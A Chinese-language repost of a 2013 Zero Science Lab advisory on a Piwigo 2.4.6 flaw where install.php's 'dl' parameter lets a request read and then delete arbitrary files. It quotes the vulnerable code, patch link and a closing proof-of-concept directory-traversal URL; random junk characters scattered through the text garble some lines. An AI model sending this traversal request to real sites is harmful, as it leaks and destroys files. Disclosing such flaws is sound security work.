Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
0 K# h3 E% z6 M; I
* P. J9 J# u& LPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
, u* \4 ]: @5 ?/install.php:
, z1 V$ y' u1 \( W* s-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
, A0 @. S1 t: _5 \115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
8 n& C* U" j5 Y! h5 B% _) _6 d117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
" ]& W' U6 K2 t2 {0 c4 ?121:   echo file_get_contents($filename);
122:   unlink($filename);
, i: E3 N3 ]" w; a. z, b123:   exit();
124: }
7 ]+ J. b8 H! z/ |, W( J====================================================================
5 H9 P8 c! a8 C
3 e! Y1 u0 [: XTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
1 `# m5 e( k% F+ J: c; \           MySQL 5.5.25a

5 R% L1 r3 l# ^' T6 vVulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
6 O& f7 C, G7 Z+ S
4 @8 d7 v  Y2 n& b0 \; hAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
4 c8 n+ W+ N* ^: f( @" E1 q
2 @) K# _  E  V: ^2 @4 @15.02.2013

4 [8 K, ~. m8 }9 ~5 D8 ~2 n--
! f2 n5 X3 K# {8 G0 ghttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
- E1 J$ Y& }- j& m) g